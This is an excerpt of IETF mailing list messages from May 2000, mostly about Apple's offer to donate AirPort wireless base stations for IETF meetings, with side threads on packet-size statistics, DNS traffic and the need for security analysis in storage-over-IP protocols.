by mail-out1.apple.com (8.9.3/8.9.3) with ESMTP id MAA17276;
Fri, 26 May 2000 12:24:53 -0700 (PDT)
Received: from scv2.apple.com (scv2.apple.com) by mailgate1.apple.com
(Content Technologies SMTPRS 4.1.5) with ESMTP id
<[EMAIL PROTECTED]>;
Fri, 26 May 2000 12:24:36 -0700
Received: from [17.201.23.37] (chesh1.apple.com [17.201.23.37])
by scv2.apple.com (8.9.3/8.9.3) with SMTP id MAA06946;
Fri, 26 May 2000 12:24:52 -0700 (PDT)
Message-Id: <[EMAIL PROTECTED]>
Subject: IETF Wireless
Date: Fri, 26 May 2000 12:25:05 -0700
x-sender: [EMAIL PROTECTED]
x-mailer: Claris Emailer 2.0v3, January 22, 1998
From: Stuart Cheshire <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
cc: "Steve Coya" <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
X-Loop: [EMAIL PROTECTED]
There's a good chance I may be able to persuade Apple to donate a bunch
of 11Mb/s IEEE 802.11 Wireless/Ethernet bridges (the things we call
"AirPort") to IETF, on a permanent basis, for the meetings.
Any interest? How many would we want? A couple for the terminal room and
one each per meeting room?
These are absolutely standard 11Mb/s IEEE 802.11DS base stations, not
some proprietary Apple thing. PC users can get 802.11DS cards from
companies like Lucent: <http://www.wavelan.com/>
Lucent's web site provide a list of resellers:
<http://www.wavelan.com/contact/>
I have heard good reports about Brumleynet. They sell 11Mb/s WaveLAN
cards for $160: <http://www.brumleynet.com/>
Stuart Cheshire <[EMAIL PROTECTED]>
* Wizard Without Portfolio, Apple Computer
>From owner-ietf-outbound Fri May 26 16:20:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA24667
for [EMAIL PROTECTED]; Fri, 26 May 2000 16:20:02 -0400 (EDT)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.224.210])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA24511;
Fri, 26 May 2000 16:13:58 -0400 (EDT)
Received: from localhost (ole@localhost) by diablo.cisco.com (8.8.6
(PHNE_14041)/CISCO.SERVER.1.2) with SMTP id NAA27133; Fri, 26 May 2000 13:13:28 -0700
(PDT)
Date: Fri, 26 May 2000 13:13:28 -0700 (PDT)
From: "Ole J. Jacobsen" <[EMAIL PROTECTED]>
To: Stuart Cheshire <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED], Steve Coya <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
"...not some proprietary Apple thing."
I can verify that this is true, so true in fact that if you take an
AirPort station apart you will find a Lucent Silver WaveLAN card inside.
Only downside with AiPort is:
- You need a Macintosh to configure it
- It has no way to add extenal antennas to boost signal.
These are not necessarily show stoppers given the amount of Mac geeks
at IETFs and if you have enough of them I guess the antenna isn't
much of an issue.
Now, I have heard mentioned that the AirPort has a limit to the number
of users it will support, but I don't know if this is true or how it
compares to the usual kit we use at IETF meetings.
Ole
Ole J. Jacobsen
Editor and Publisher
The Internet Protocol Journal
Cisco Systems, Office of the CSO
Tel: +1 408-527-8972
e-mail: [EMAIL PROTECTED]
URL: http://www.cisco.com/ipj
* See you at INET 2000, Yokohama, Japan July 18-21
http://www.isoc.org/inet2000
>From owner-ietf-outbound Fri May 26 16:30:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA24899
for [EMAIL PROTECTED]; Fri, 26 May 2000 16:30:03 -0400 (EDT)
Received: from mail.shadow.net (mail.shadow.net [204.177.71.231])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA24799
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 16:25:09 -0400 (EDT)
Received: from flywheel.com (ppp-221.shadow.net [207.17.58.241])
by mail.shadow.net (8.9.3+Sun/8.9.3) with ESMTP id QAA23831
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 16:14:00 -0400 (EDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 16:25:01 -0400
From: Craig Simon <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
X-Mailer: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Cite on DNS-related traffic.
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I recall once seeing a graph shown by Christian Huitema indicating that
DNS-related overhead accounted for about 5 to 10 percent of Internet traffic.
Can anyone provide a link for this or equivalent documentation?
Thanks.
Craig Simon
>From owner-ietf-outbound Fri May 26 16:50:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA25399
for [EMAIL PROTECTED]; Fri, 26 May 2000 16:50:02 -0400 (EDT)
Received: from gallium.network-alchemy.com (Gallium.Network-Alchemy.COM
[199.46.17.139])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA25285;
Fri, 26 May 2000 16:45:35 -0400 (EDT)
Received: from gallium.network-alchemy.com (localhost.network-alchemy.com [127.0.0.1])
by gallium.network-alchemy.com (8.8.8/8.8.8) with ESMTP id NAA12792;
Fri, 26 May 2000 13:44:58 -0700 (PDT)
(envelope-from [EMAIL PROTECTED])
Message-Id: <[EMAIL PROTECTED]>
To: "Ole J. Jacobsen" <[EMAIL PROTECTED]>
cc: Stuart Cheshire <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
Steve Coya <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
In-reply-to: Your message of "Fri, 26 May 2000 13:13:28 PDT."
<[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 13:44:58 -0700
From: "Derrell D. Piper" <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> I can verify that this is true, so true in fact that if you take an
> AirPort station apart you will find a Lucent Silver WaveLAN card inside.
> Only downside with AiPort is:
Also, this page:
http://www.msrl.com/airport-gold/
...has information about upgrading an Airport to a Lucent Gold card with
128-bit encryption.
> - You need a Macintosh to configure it
There is a Windows-based configuration utility that I've seen used to
configure the Airport sucessfully. See the "Karlbridge configurator for
Windows" link on the page listed above.
Derrell
>From owner-ietf-outbound Fri May 26 17:00:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA25686
for [EMAIL PROTECTED]; Fri, 26 May 2000 17:00:03 -0400 (EDT)
Received: from Intrepid.srv.paranet.com (kirkwood.paranet.com [199.164.131.35])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA25630
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 16:57:35 -0400 (EDT)
Received: from stevetecra (steve_tecra.whq.sprint.com [10.70.141.64]) by
Intrepid.srv.paranet.com (8.7.1/8.7.1) with SMTP id PAA13302; Fri, 26 May 2000
15:57:04 -0500 (CDT)
From: "Steve Dispensa" <[EMAIL PROTECTED]>
To: "'Stuart Cheshire'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Cc: "Deep Medhi \(E-mail\)" <[EMAIL PROTECTED]>
Subject: RE: Average Ethernet packet length
Date: Fri, 26 May 2000 15:58:49 -0500
Message-ID: <002101bfc755$31a90010$408d460a@stevetecra>
MIME-Version: 1.0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Here are some stats from an RMON probe on one of our broadband consumer
Internet access networks. It's sitting between our access network and our
Internet transit connections, so it sees every packet coming from or going
to the subscribers. This represents about 7TB worth of data over the last
few months.
Packet Size Distribution
All numbers are percentages
Downstream Upstream
---------- --------
0 - 64 14.68 58.49
65 - 127 13.87 29.73
128 - 255 7.25 1.72
256 - 511 6.44 3.98
512 - 1023 13.59 3.37
1024 - 1518 44.17 2.70
It's interesting to note the disparity between the upstream and downstream
distributions. I was also surprised to see that half of the packets on the
downstream are significantly larger than 576. I just wish I had a bucket
boundary at 576+18. Still, there's no ambiguity about the 44% of packets
that are (probably) at Ethernet MTU.
Steve Dispensa
Sr. Network Architect
Sprint Broadband Wireless Group
-----Original Message-----
From: Stuart Cheshire [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 25, 2000 9:10 PM
To: [EMAIL PROTECTED]
Subject: Re: Average Ethernet packet length
>There are no good, current studies on LAN behavior that I've seen.
>There have been a number of papers on WAN behavior. The usual result
>of those is that ~40-50% of packets are about 40-44 bytes, but most of
>the bytes are carried by packets of ~500-576 or 1500 bytes.
>
> --Steve Bellovin
In some traces I did for my PhD work about three years ago, I found that
51% of the packets were 40 or 41 bytes long (i.e. mostly TCP acks or
one-byte TCP payloads). Only 15% of the packets were maximum-sized. The
average packet size was 273 bytes. This workload was probably heavier on
telnet than today's networks; however even when doing bulk file transfer,
one packet in three is still an ack.
Stuart Cheshire <[EMAIL PROTECTED]>
* Wizard Without Portfolio, Apple Computer
>From owner-ietf-outbound Fri May 26 17:10:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA25967
for [EMAIL PROTECTED]; Fri, 26 May 2000 17:10:02 -0400 (EDT)
Received: from CU.NIH.GOV (silkt.nih.gov [128.231.160.112])
by ietf.org (8.9.1a/8.9.1a) with SMTP id QAA25650;
Fri, 26 May 2000 16:58:44 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
From: "Roger Fajman" <[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 16:58:28 -0400 (EDT)
Subject: Re: IETF Wireless
X-Loop: [EMAIL PROTECTED]
> There's a good chance I may be able to persuade Apple to donate a bunch
> of 11Mb/s IEEE 802.11 Wireless/Ethernet bridges (the things we call
> "AirPort") to IETF, on a permanent basis, for the meetings.
>
> Any interest? How many would we want? A couple for the terminal room and
> one each per meeting room?
>
> These are absolutely standard 11Mb/s IEEE 802.11DS base stations, not
> some proprietary Apple thing. PC users can get 802.11DS cards from
> companies like Lucent: <http://www.wavelan.com/>
Is there a way to turn off the NAT in the AirPort access points? We've
had trouble here with PCs using them because the NAT implementation
doesn't handle NETBIOS. Also, given the general dislike of many people
in the IETF for NAT, it may not be something that the IETF wants to use
itself.
>From owner-ietf-outbound Fri May 26 17:20:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA26241
for [EMAIL PROTECTED]; Fri, 26 May 2000 17:20:03 -0400 (EDT)
Received: from ns.skylink.it ([EMAIL PROTECTED] [194.177.113.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA25984;
Fri, 26 May 2000 17:10:25 -0400 (EDT)
Received: from kim.ispra.webweaving.org (va-168.skylink.it [194.185.55.168])
by ns.skylink.it (8.9.1/8.8.8) with ESMTP id XAA09843;
Fri, 26 May 2000 23:09:53 +0200
Received: from kim.ispra.webweaving.org (kim.ispra.webweaving.org [10.10.0.2])
by kim.ispra.webweaving.org (8.8.8/8.8.5) with ESMTP id UAA05845;
Fri, 26 May 2000 20:59:06 GMT
X-Passed: MX on Ispra.WebWeaving.org Fri, 26 May 2000 20:59:06 GMT and masked
X-No-Spam: Neither the receipients nor the senders email address(s) are
to be used for Unsolicited (Commercial) Email without the
explicit written consent of either party; as a per-message
fee is incurred for inbound and outbound traffic to the originator.
Posted-Date: Fri, 26 May 2000 20:59:06 GMT
Date: Fri, 26 May 2000 22:59:06 +0200 (CEST)
From: Dirk-Willem van Gulik <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: Stuart Cheshire <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED], Steve Coya <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Fri, 26 May 2000, Stuart Cheshire wrote:
> These are absolutely standard 11Mb/s IEEE 802.11DS base stations, not
> some proprietary Apple thing. PC users can get 802.11DS cards from
> companies like Lucent: <http://www.wavelan.com/>
I can vouch for this; they work 100% fine with the Nortel, Baystack and
Fallaron cards (which each work on freebsd 3.x and above).
DW
>From owner-ietf-outbound Fri May 26 18:40:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA27157
for [EMAIL PROTECTED]; Fri, 26 May 2000 18:40:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA27118
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 18:35:16 -0400 (EDT)
Received: from langfjella.Alvestrand.no ([10.128.167.143])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id AAA05599;
Sat, 27 May 2000 00:35:00 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sat, 27 May 2000 00:27:01 +0200
To: [EMAIL PROTECTED]
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: RE: Storage over Ethernet/IP
Cc: [EMAIL PROTECTED]
In-Reply-To: <A427D1278F7CD311B1670008C7FAA62AC89F1F@CORPNT3>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 10:14 26.05.2000 -0500, [EMAIL PROTECTED] wrote:
>True, but whether the server accesses the disks via SCSI over TCP or SCSI
>over Fibre Channel, the SERVER is still the weak link. The transport
>protocol doesn't create any inherent weaknesses of the type you are
>refering to--e-mail borne viruses, internal hackers, etc. The server
>would still be the attack point. Why goodness, the server and storage
>devices could be in a VLAN or something to deny direct hack attempts
>against the storage device, but the chink in the armor is how hardened is
>your OS?
did you hear the story about the MIT students who broke encryption in
Netscape by replacing the page of the binary containing the crypto
verification code (sniffing the NFS request and replying faster than the
real fileserver) while it was being transferred over the network?
Replacing a dedicated medium (such as a SCSI bus) with a shared medium
(such as an Ethernet cable plant) always opens new chinks.
The point being made, remade and made again here is:
- Any IP technology will be used in contexts where there are security threats
- Any protocol that offers no means of countering such security threats is
broken, and should not be considered for standardization.
It is perfectly possible that after conducting a threat and modality
analysis, one ends up with saying that hardware-accelerated IPsec using
host identities is adequate for the scenarios involving
otherwise-unprotected Internet links, and that a mode with no protection is
adequate when the media is physically secured.
But the analysis MUST BE DONE.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Fri May 26 19:00:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA27333
for [EMAIL PROTECTED]; Fri, 26 May 2000 19:00:03 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA27238;
Fri, 26 May 2000 18:50:14 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id SAA04974;
Fri, 26 May 2000 18:50:12 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: "Roger Fajman" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IETF Wireless
In-reply-to: Your message of "Fri, 26 May 2000 16:58:28 EDT."
<[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 18:50:12 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> Is there a way to turn off the NAT in the AirPort access points?
if not, seems like that would be a showstopper.
>From owner-ietf-outbound Fri May 26 19:10:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA27514
for [EMAIL PROTECTED]; Fri, 26 May 2000 19:10:02 -0400 (EDT)
Received: from mail-out1.apple.com (mail-out1.apple.com [17.254.0.52])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA27288;
Fri, 26 May 2000 18:57:21 -0400 (EDT)
Received: from mailgate2.apple.com (A17-129-100-225.apple.com [17.129.100.225])
by mail-out1.apple.com (8.9.3/8.9.3) with ESMTP id PAA17206;
Fri, 26 May 2000 15:57:23 -0700 (PDT)
Received: from scv3.apple.com (scv3.apple.com) by mailgate2.apple.com
(Content Technologies SMTPRS 2.0.15) with ESMTP id <[EMAIL PROTECTED]>;
Fri, 26 May 2000 15:57:13 -0700
Received: from [17.201.23.37] (chesh1.apple.com [17.201.23.37])
by scv3.apple.com (8.9.3/8.9.3) with SMTP id PAA25692;
Fri, 26 May 2000 15:57:13 -0700 (PDT)
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Date: Fri, 26 May 2000 15:57:26 -0700
x-sender: [EMAIL PROTECTED]
x-mailer: Claris Emailer 2.0v3, January 22, 1998
From: Stuart Cheshire <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
X-Loop: [EMAIL PROTECTED]
I'm getting a flood of individual questions here, so I'll stem the flow
by answering them publicly:
>That would be great. Will they sell them at a discount to the rest of us?
The current retail price of $300 is already a "discount" price. For that
price you get 11Mb/s wireless, 10Mb/s Ethernet with DHCP client, a 56k
modem with PPP, DHCP server on both wired and wireless interfaces, DNS
relay, Ethernet-level bridging, IP-level routing, WEP encryption, nice
configuration software (that runs on a Mac) and even (ugh!) a NAT
gateway. I'll let you speculate about how much profit Apple makes on each
unit.
For details, see <http://www.apple.com/airport/>.
One word of warning, before you rush out and buy one: Understand that
Apple makes this product in order to sell more Macs (all Macs, desktop
and laptop, come with dual antennas moulded into the plastics and a slot
for the $99 add-on card). If, after you buy a base station, you call the
Apple support line and start your question with, "I have this Intel
laptop running Linux...", then they are unlikely to give you much
sympathy. If this is a problem for you, you should avoid buying a
wireless base station from Apple. Many other vendors, including Lucent,
sell them too.
Bill Fenner has a page of unofficial information about the Apple wireless
base station:
<http://www.aciri.org/fenner/airport/airport.html>
My reason for offering these to the IETF is to help the IETF, and within
reason I will do as much as I can to help the IETF use them, including
sitting there with my Mac laptop to configure them if necessary, but
Apple does not extend that offer in general to every PC owner.
>the "gold" level of encryption may be important to lots of people, but as
>far as I know, the AirPort basestations only support the weaker crypto.
AirPort base stations are fully 100% compatible with end-to-end IPSEC :-)
Besides, if you tell 3000 people at an IETF meeting the single shared
network key, it hardly matters how many bits are in it -- it's simply not
a secret any more.
AirPort uses the Lucent Silver card, which Lucent calls "64-bit RC4",
even though 24 of the bits are a fixed "seed" value. Apple calls this
"40-bit RC4", which is a little more honest.
>- It has no way to add extenal antennas to boost signal.
Not true. I know people who've drilled a little hole in the case and
attached an external Lucent antenna to the card inside.
>Stuart, if I recall, the beacons (base stations) can't be
>configured without an Apple laptop running an appropriate
>version of the software and operating system. Has that changed?
>If not, I have no idea whether we have such machines available
>or how we would find or scrounge one (and presumably a second as
>backup) to make the donation viable (the Lucent bridges that
>have been most often used of late can be configured from any of
>Win NT, Win95/98, or some U**x flavors).
There are unsupported tools to configure AirPorts from Windows, and I've
even heard that there's a Java version too.
However, I'd recommend just setting them all to simple Ethernet-level
bridging, and disabling all the other features, and then you don't ever
need to reconfigure them again. I have several PC-owning friends who use
AirPorts like this.
>Is there a way to turn off the NAT in the AirPort access points? We've
>had trouble here with PCs using them because the NAT implementation
>doesn't handle NETBIOS. Also, given the general dislike of many people
>in the IETF for NAT, it may not be something that the IETF wants to use
>itself.
Ha! Made me laugh.
Do you seriously think I'd let Apple ship a product that forced you to
use NAT? Be serious!
Stuart Cheshire <[EMAIL PROTECTED]>
* Wizard Without Portfolio, Apple Computer
>From owner-ietf-outbound Fri May 26 19:20:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA27653
for [EMAIL PROTECTED]; Fri, 26 May 2000 19:20:02 -0400 (EDT)
Received: from gallium.network-alchemy.com (Gallium.Network-Alchemy.COM
[199.46.17.139])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA27579;
Fri, 26 May 2000 19:12:03 -0400 (EDT)
Received: from gallium.network-alchemy.com (localhost.network-alchemy.com [127.0.0.1])
by gallium.network-alchemy.com (8.8.8/8.8.8) with ESMTP id QAA13416;
Fri, 26 May 2000 16:11:29 -0700 (PDT)
(envelope-from [EMAIL PROTECTED])
Message-Id: <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
cc: "Roger Fajman" <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED]
Subject: Re: IETF Wireless
In-reply-to: Your message of "Fri, 26 May 2000 18:50:12 EDT."
<[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 16:11:29 -0700
From: "Derrell D. Piper" <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> Is there a way to turn off the NAT in the AirPort access points?
Yes, there is.
Derrell
>From owner-ietf-outbound Fri May 26 20:20:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA28332
for [EMAIL PROTECTED]; Fri, 26 May 2000 20:20:02 -0400 (EDT)
Received: from sj-msg-core-2.cisco.com (sj-msg-core-2.cisco.com [171.69.43.88])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA28277
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 20:11:46 -0400 (EDT)
Received: from wooly-booly.cisco.com (wooly-booly.cisco.com [171.69.167.33])
by sj-msg-core-2.cisco.com (8.9.3/8.9.1) with ESMTP id RAA04971;
Fri, 26 May 2000 17:11:21 -0700 (PDT)
Received: from p7020-img-nt.cisco.com (fred-hm-dhcp1.cisco.com [171.69.128.116]) by
wooly-booly.cisco.com (8.8.8-Cisco List Logging/CISCO.WS.1.2) with ESMTP id TAA03396;
Fri, 26 May 2000 19:11:11 -0500 (CDT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Fri, 26 May 2000 16:46:41 -0700
To: "Morrisey Matthew J." <[EMAIL PROTECTED]>
From: Fred Baker <[EMAIL PROTECTED]>
Subject: Re: 48th IETF meeting in Pittsburgh, PA
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
In-Reply-To: <6FDE0867413DD21182BF00A0C972519204C98A15@MSWG4>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 10:15 AM 5/25/00 -0400, Morrisey Matthew J. wrote:
>Where can i find more info?
have you checked www.ietf.org?
>From owner-ietf-outbound Fri May 26 20:50:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA28674
for [EMAIL PROTECTED]; Fri, 26 May 2000 20:50:03 -0400 (EDT)
Received: from rip.psg.com (rip.psg.com [147.28.0.39])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA28649;
Fri, 26 May 2000 20:49:27 -0400 (EDT)
Received: from randy by rip.psg.com with local (Exim 3.13 #1)
id 12vUn4-000IYK-00; Fri, 26 May 2000 17:49:22 -0700
From: Randy Bush <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Keith Moore <[EMAIL PROTECTED]>
Cc: "Roger Fajman" <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED]
Subject: Re: IETF Wireless
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 17:49:22 -0700
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
>> Is there a way to turn off the NAT in the AirPort access points?
> if not, seems like that would be a showstopper.
actually it might be a feature to torture the anti-nat bigots
>From owner-ietf-outbound Sat May 27 08:32:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA17108
for [EMAIL PROTECTED]; Sat, 27 May 2000 08:30:02 -0400 (EDT)
Received: from inner.net (avarice.inner.net [199.33.248.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA17079
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 08:27:07 -0400 (EDT)
Received: from wasp.inet.org ([216.52.8.30])
by inner.net (8.7.6/8.9.3) with ESMTP id MAA07333
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 12:18:03 GMT
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Sat, 27 May 2000 08:26:50 +0100
To: [EMAIL PROTECTED]
From: RJ Atkinson <[EMAIL PROTECTED]>
Subject: AirPort or WaveLAN Access Point MIBs ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
If someone could send me a unicast reply email with a pointer
to the SMI for the private MIBs implemented by the Apple Airport and/or
the Lucent WaveLAN Access Point, that would be much appreciated.
If the reply mail is unicast to me, I'll package up a summary
and send the summary back to the IETF list within a week. I propose
this approach to conserve list bandwidth and other folks' time. YMMV.
Thanks,
Ran
[EMAIL PROTECTED]
>From owner-ietf-outbound Sat May 27 09:31:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA17618
for [EMAIL PROTECTED]; Sat, 27 May 2000 09:30:02 -0400 (EDT)
Received: from sean.ebone.net (IDENT:[EMAIL PROTECTED] [195.158.227.211])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA17593;
Sat, 27 May 2000 09:29:08 -0400 (EDT)
Received: by sean.ebone.net (Postfix, from userid 1113)
id 8C792882; Sat, 27 May 2000 15:29:07 +0200 (CEST)
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IETF Wireless
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
Date: Sat, 27 May 2000 15:29:07 +0200 (CEST)
From: [EMAIL PROTECTED] (Sean Doran)
X-Loop: [EMAIL PROTECTED]
Randy Bush writes:
| actually it might be a feature to torture the anti-nat bigots
Maybe they wouldn't notice.
Sean.
>From owner-ietf-outbound Sat May 27 09:41:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA17843
for [EMAIL PROTECTED]; Sat, 27 May 2000 09:40:02 -0400 (EDT)
Received: from chmls06.mediaone.net (chmls06.mediaone.net [24.128.1.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA17780
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:15 -0400 (EDT)
Received: from [192.168.168.2] (h0040100c9388.ne.mediaone.net [24.218.168.80])
by chmls06.mediaone.net (8.8.7/8.8.7) with ESMTP id JAA03313
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:12 -0400 (EDT)
Mime-Version: 1.0
X-Sender: [EMAIL PROTECTED]
Message-Id: <v04220800b5557ebba1ac@[192.168.168.2]>
In-Reply-To: <v04220802b554b39deb1c@[192.168.168.2]>
References: <[EMAIL PROTECTED]>
<v04220802b554b39deb1c@[192.168.168.2]>
Date: Sat, 27 May 2000 09:37:00 -0400
To: [EMAIL PROTECTED]
From: Jon Malis <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Loop: [EMAIL PROTECTED]
I Think That I Wrote In An eMail At 7:08 PM -0400 of 5/26/00:
>I Think That Roger Fajman Wrote In An eMail At 4:58 PM -0400 of 5/26/00:
>>
>>We've had trouble here with PCs using them because the NAT implementation
>>doesn't handle NETBIOS. Also, given the general dislike of many people
>>in the IETF for NAT, it may not be something that the IETF wants to use
>>itself.
>
>Except for getting a Mac with an AirPort card to setup up the thing
>properly, you're more or less out of luck. I know that there's a
>Java-based admin tool, but I don't think it goes that deep into the
>config settings, nor do I remember the URL off the top of my head
I lied - you can change most all settings with the Java Applet and I
found the Web address for it:
http://edge.mcs.drexel.edu/GICL/people/sevy/airport/
For more info about extending the antenna, try:
http://www.applefritter.com/hacks/extendaport/index.html
--jon
Jon Malis
Independent Network Consultant
Malis Consulting
[EMAIL PROTECTED], [EMAIL PROTECTED], AIM: JonMalis
--------------------------------------------------------------------
"640KB is enough for anybody" -Bill Gates
PGP Fingerprint: B32E 4B26 A2BC CF38 B56B C518 1179 DE90 1477 00E9
PGP Key ID: 0x147700E9
>From owner-ietf-outbound Sat May 27 09:51:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA17973
for [EMAIL PROTECTED]; Sat, 27 May 2000 09:50:03 -0400 (EDT)
Received: from chmls06.mediaone.net (chmls06.mediaone.net [24.128.1.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA17787
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:17 -0400 (EDT)
Received: from [192.168.168.2] (h0040100c9388.ne.mediaone.net [24.218.168.80])
by chmls06.mediaone.net (8.8.7/8.8.7) with ESMTP id JAA03397
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:17 -0400 (EDT)
